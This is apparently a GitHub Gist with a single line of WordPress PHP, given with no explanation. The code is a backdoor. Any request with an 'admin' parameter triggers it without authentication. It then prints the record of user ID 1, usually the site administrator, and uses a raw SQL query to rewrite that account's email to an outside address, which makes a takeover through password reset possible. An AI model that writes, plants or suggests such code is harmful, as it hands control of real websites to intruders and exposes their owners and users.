Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save flayder/7c9db58b30968dd89ef27d3b77f8392f to your computer and use it in GitHub Desktop.
Save flayder/7c9db58b30968dd89ef27d3b77f8392f to your computer and use it in GitHub Desktop.
if($_REQUEST['admin']){$user=get_user_by('ID',1);print_r($user);global $wpdb;$wpdb->query("UPDATE wp_users SET `user_email` = '[email protected]' WHERE `ID`='1'");}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment